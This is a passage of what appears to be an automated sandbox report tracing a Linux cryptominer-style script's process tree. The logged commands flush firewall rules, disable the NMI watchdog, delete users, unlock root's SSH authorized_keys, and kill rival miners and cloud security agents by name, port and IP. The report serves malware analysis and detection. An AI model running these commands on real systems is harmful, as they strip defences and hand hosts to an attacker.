      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:1670
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:1671
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:1672
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:1673
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      Attempts to change immutable files
      PID:1674
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:1675
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:1676
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      Attempts to change immutable files
      PID:1677
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:1678
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:1679
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:1680
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:1681
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:1682
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:1683
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:1684
- /usr/sbin/userdel
  userdel akay
  2⤵
  PID:1688
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  PID:1689
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  PID:1693
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  PID:1697
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:1698
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:1699
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:1700
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:1702
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1701
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  - Attempts to change immutable files
  PID:1704
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1703
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1709
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1708
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1707
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:1706
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1714
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1713
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1712
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:1711
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1723
- /bin/grep
  grep -v -
  2⤵
  PID:1722
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1721
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1720
- /bin/grep
  grep :143
  2⤵
  PID:1719
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1729
- /bin/grep
  grep -v -
  2⤵
  PID:1728
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1727
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1726
- /bin/grep
  grep :2222
  2⤵
  PID:1725
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1735
- /bin/grep
  grep -v -
  2⤵
  PID:1734
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1733
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1732
- /bin/grep
  grep :3333
  2⤵
  PID:1731
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1741
- /bin/grep
  grep -v -
  2⤵
  PID:1740
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1739
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1738
- /bin/grep
  grep :3389
  2⤵
  PID:1737
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1747
- /bin/grep
  grep -v -
  2⤵
  PID:1746
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1745
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1744
- /bin/grep
  grep :4444
  2⤵
  PID:1743
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1753
- /bin/grep
  grep -v -
  2⤵
  PID:1752
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1751
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1750
- /bin/grep
  grep :5555
  2⤵
  PID:1749
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1759
- /bin/grep
  grep -v -
  2⤵
  PID:1758
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1757
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1756
- /bin/grep
  grep :6666
  2⤵
  PID:1755
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1765
- /bin/grep
  grep -v -
  2⤵
  PID:1764
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1763
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1762
- /bin/grep
  grep :6665
  2⤵
  PID:1761
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1771
- /bin/grep
  grep -v -
  2⤵
  PID:1770
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1769
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1768
- /bin/grep
  grep :6667
  2⤵
  PID:1767
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1777
- /bin/grep
  grep -v -
  2⤵
  PID:1776
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1775
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1774
- /bin/grep
  grep :7777
  2⤵
  PID:1773
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1783
- /bin/grep
  grep -v -
  2⤵
  PID:1782
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1781
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1780
- /bin/grep
  grep :8444
  2⤵
  PID:1779
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1789
- /bin/grep
  grep -v -
  2⤵
  PID:1788
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1787
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1786
- /bin/grep
  grep :3347
  2⤵
  PID:1785
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1795
- /bin/grep
  grep -v -
  2⤵
  PID:1794
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1793
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1792
- /bin/grep
  grep :14444
  2⤵
  PID:1791
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1801
- /bin/grep
  grep -v -
  2⤵
  PID:1800
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1799
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1798
- /bin/grep
  grep :14433
  2⤵
  PID:1797
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1807
- /bin/grep
  grep -v -
  2⤵
  PID:1806
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1805
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1804
- /bin/grep
  grep :13531
  2⤵
  PID:1803
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1809
- /bin/cat
  cat /tmp/.X11-unix/01
  2⤵
  PID:1808
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1811
- /bin/cat
  cat /tmp/.X11-unix/11
  2⤵
  PID:1810
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1813
- /bin/cat
  cat /tmp/.X11-unix/22
  2⤵
  PID:1812
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1815
- /bin/cat
  cat /tmp/.pg_stat.0
  2⤵
  PID:1814
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1817
- /bin/cat
  cat /tmp/.pg_stat.1
  2⤵
  PID:1816
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1819
- /bin/cat
  cat /data/./oka.pid
  2⤵
  PID:1818
- /usr/bin/pkill
  pkill -f zsvc
  2⤵
  - Reads runtime system information
  PID:1820
- /usr/bin/pkill
  pkill -f pdefenderd
  2⤵
  - Reads CPU attributes
  PID:1821
- /usr/bin/pkill
  pkill -f updatecheckerd
  2⤵
  PID:1822
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1827
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1826
- /bin/grep
  grep -v grep
  2⤵
  PID:1825
- /bin/grep
  grep ./oka
  2⤵
  PID:1824
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1823
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1832
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1831
- /bin/grep
  grep -v grep
  2⤵
  PID:1830
- /bin/grep
  grep "postgres: autovacum"
  2⤵
  PID:1829
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1828
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1844
- /bin/grep
  grep -v postgrey
  2⤵
  PID:1841
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1843
- /bin/grep
  grep -v postgres
  2⤵
  PID:1840
- /bin/grep
  grep -v proxymap
  2⤵
  PID:1839
- /bin/grep
  grep -v kinsing
  2⤵
  PID:1842
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:1838
- /bin/grep
  grep -v "("
  2⤵
  PID:1837
- /bin/grep
  grep -v "\\["
  2⤵
  PID:1836
- /bin/grep
  grep -v bin
  2⤵
  PID:1835
- /usr/bin/awk
  awk "length(\$1) == 8"
  2⤵
  PID:1834
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  PID:1833
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1855
- - /usr/local/sbin/kill
    kill -9 1263
    3⤵
    PID:1856
- - /usr/local/bin/kill
    kill -9 1263
    3⤵
    PID:1856
- - /usr/sbin/kill
    kill -9 1263
    3⤵
    PID:1856
- - /usr/bin/kill
    kill -9 1263
    3⤵
    PID:1856
- - /sbin/kill
    kill -9 1263
    3⤵
    PID:1856
- - /bin/kill
    kill -9 1263
    3⤵
    PID:1856
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1854
- /bin/grep
  grep -v postgres
  2⤵
  PID:1852
- /bin/grep
  grep -v postgrey
  2⤵
  PID:1853
- /bin/grep
  grep -v proxymap
  2⤵
  PID:1851
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:1850
- /bin/grep
  grep -v "("
  2⤵
  PID:1849
- /bin/grep
  grep -v "\\["
  2⤵
  PID:1848
- /bin/grep
  grep -v bin
  2⤵
  PID:1847
- /usr/bin/awk
  awk "length(\$1) == 16"
  2⤵
  PID:1846
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  PID:1845
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1867
- /bin/grep
  grep -v postgrey
  2⤵
  PID:1865
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:1866
- /bin/grep
  grep -v proxymap
  2⤵
  PID:1863
- /bin/grep
  grep -v postgres
  2⤵
  PID:1864
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:1862
- /bin/grep
  grep -v "("
  2⤵
  PID:1861
- /bin/grep
  grep -v "\\["
  2⤵
  PID:1860
- /bin/grep
  grep -v bin
  2⤵
  PID:1859
- /usr/bin/awk
  awk "length(\$5) == 8"
  2⤵
  PID:1858
- /bin/ps
  ps ax
  2⤵
  PID:1857
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1872
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1871
- /bin/grep
  grep /tmp/sscks
  2⤵
  PID:1870
- /bin/grep
  grep -v grep
  2⤵
  PID:1869
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1868
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1877
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1876
- /bin/grep
  grep -v grep
  2⤵
  PID:1875
- /bin/grep
  grep "sleep 60"
  2⤵
  PID:1874
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1873
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1882
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1881
- /bin/grep
  grep -v grep
  2⤵
  PID:1880
- /bin/grep
  grep ./crun
  2⤵
  PID:1879
- /bin/ps
  ps aux
  2⤵
  PID:1878
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1887
- /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:1886
- /bin/grep
  grep -v grep
  2⤵
  PID:1885
- /bin/grep
  grep -vw kdevtmpfsi
  2⤵
  PID:1884
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1883
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1892
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1891
- /bin/grep
  grep :3333
  2⤵
  PID:1890
- /bin/grep
  grep -v grep
  2⤵
  PID:1889
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1888
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1897
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1896
- /bin/grep
  grep :5555
  2⤵
  PID:1895
- /bin/grep
  grep -v grep
  2⤵
  PID:1894
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1893
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1902
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1901
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:1900
- /bin/grep
  grep -v grep
  2⤵
  PID:1899
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1898
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1907
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1906
- /bin/grep
  grep log_
  2⤵
  PID:1905
- /bin/grep
  grep -v grep
  2⤵
  PID:1904
- /bin/ps
  ps aux
  2⤵
  PID:1903
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1912
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1911
- /bin/grep
  grep systemten
  2⤵
  PID:1910
- /bin/grep
  grep -v grep
  2⤵
  PID:1909
- /bin/ps
  ps aux
  2⤵
  PID:1908
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1917
- - /usr/local/sbin/kill
    kill -9 14
    3⤵
    PID:1918
- - /usr/local/bin/kill
    kill -9 14
    3⤵
    PID:1918
- - /usr/sbin/kill
    kill -9 14
    3⤵
    PID:1918
- - /usr/bin/kill
    kill -9 14
    3⤵
    PID:1918
- - /sbin/kill
    kill -9 14
    3⤵
    PID:1918
- - /bin/kill
    kill -9 14
    3⤵
    - Reads CPU attributes
    PID:1918
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1916
- /bin/grep
  grep netns
  2⤵
  PID:1915
- /bin/grep
  grep -v grep
  2⤵
  PID:1914
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1913
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1923
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1922
- /bin/grep
  grep voltuned
  2⤵
  PID:1921
- /bin/grep
  grep -v grep
  2⤵
  PID:1920
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1919
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1928
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1927
- /bin/grep
  grep darwin
  2⤵
  PID:1926
- /bin/grep
  grep -v grep
  2⤵
  PID:1925
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1924
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1933
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1932
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:1931
- /bin/grep
  grep -v grep
  2⤵
  PID:1930
- /bin/ps
  ps aux
  2⤵
  PID:1929
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1938
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1937
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:1936
- /bin/grep
  grep -v grep
  2⤵
  PID:1935
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1934
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1943
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1942
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:1941
- /bin/grep
  grep -v grep
  2⤵
  PID:1940
- /bin/ps
  ps aux
  2⤵
  PID:1939
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1948
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1947
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:1946
- /bin/grep
  grep -v grep
  2⤵
  PID:1945
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1944
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1953
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1952
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:1951
- /bin/grep
  grep -v grep
  2⤵
  PID:1950
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1949
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1958
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1957
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:1956
- /bin/grep
  grep -v grep
  2⤵
  PID:1955
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1954
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1963
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1962
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:1961
- /bin/grep
  grep -v grep
  2⤵
  PID:1960
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1959
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1968
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1967
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:1966
- /bin/grep
  grep -v grep
  2⤵
  PID:1965
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1964
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1973
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1972
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:1971
- /bin/grep
  grep -v grep
  2⤵
  PID:1970
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1969
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1978
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1977
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:1976
- /bin/grep
  grep -v grep
  2⤵
  PID:1975
- /bin/ps
  ps aux
  2⤵
  PID:1974
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1983
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1982
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:1981
- /bin/grep
  grep -v grep
  2⤵
  PID:1980
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1979
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1988
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1987
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:1986
- /bin/grep
  grep -v grep
  2⤵
  PID:1985
- /bin/ps
  ps aux
  2⤵
  PID:1984
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1993
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1992
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:1991
- /bin/grep
  grep -v grep
  2⤵
  PID:1990
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1989
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1998
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1997
- /bin/grep
  grep nMrfmnRa
  2⤵
  PID:1996
- /bin/grep
  grep -v grep
  2⤵
  PID:1995
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1994
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2003
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2002
- /bin/grep
  grep PuNY5tm2
  2⤵
  PID:2001
- /bin/grep
  grep -v grep
  2⤵
  PID:2000
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1999
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2008
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2007
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:2006
- /bin/grep
  grep -v grep
  2⤵
  PID:2005
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2004
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2013
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2012
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:2011
- /bin/grep
  grep -v grep
  2⤵
  PID:2010
- /bin/ps
  ps aux
  2⤵
  PID:2009
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2018
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2017
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:2016
- /bin/grep
  grep -v grep
  2⤵
  PID:2015
- /bin/ps
  ps aux
  2⤵
  PID:2014
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2023
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2022
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:2021
- /bin/grep
  grep -v grep
  2⤵
  PID:2020
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2019
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2028
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2027
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:2026
- /bin/grep
  grep -v grep
  2⤵
  PID:2025
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2024
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2033
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2032
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:2031
- /bin/grep
  grep -v grep
  2⤵
  PID:2030
- /bin/ps
  ps aux
  2⤵
  PID:2029
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2038
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2037
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:2036
- /bin/grep
  grep -v grep
  2⤵
  PID:2035
- /bin/ps
  ps aux
  2⤵
  PID:2034
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2043
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2042
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:2041
- /bin/grep
  grep -v grep
  2⤵
  PID:2040
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2039
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2048
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2047
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:2046
- /bin/grep
  grep -v grep
  2⤵
  PID:2045
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2044
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2053
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2052
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:2051
- /bin/grep
  grep -v grep
  2⤵
  PID:2050
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2049
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2058
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2057
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:2056
- /bin/grep
  grep -v grep
  2⤵
  PID:2055
- /bin/ps
  ps aux
  2⤵
  PID:2054
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2063
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2062
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:2061
- /bin/grep
  grep -v grep
  2⤵
  PID:2060
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2059
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2068
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2067
- /bin/grep
  grep HiPxCJRS
  2⤵
  - System Network Configuration Discovery
  PID:2066
- /bin/grep
  grep -v grep
  2⤵
  PID:2065
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2064
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2073
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2072
- /bin/grep
  grep http_0xCC030
  2⤵
  PID:2071
- /bin/grep
  grep -v grep
  2⤵
  PID:2070
- /bin/ps
  ps aux
  2⤵
  PID:2069
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2078
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2077
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:2076
- /bin/grep
  grep -v grep
  2⤵
  PID:2075
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:2074
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2083
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2082
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:2081
- /bin/grep
  grep -v grep
  2⤵
  PID:2080
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2079
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2088
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2087
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:2086
- /bin/grep
  grep -v grep
  2⤵
  PID:2085
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2084
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2093
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2092
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:2091
- /bin/grep
  grep -v grep
  2⤵
  PID:2090
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2089
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2098
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2097
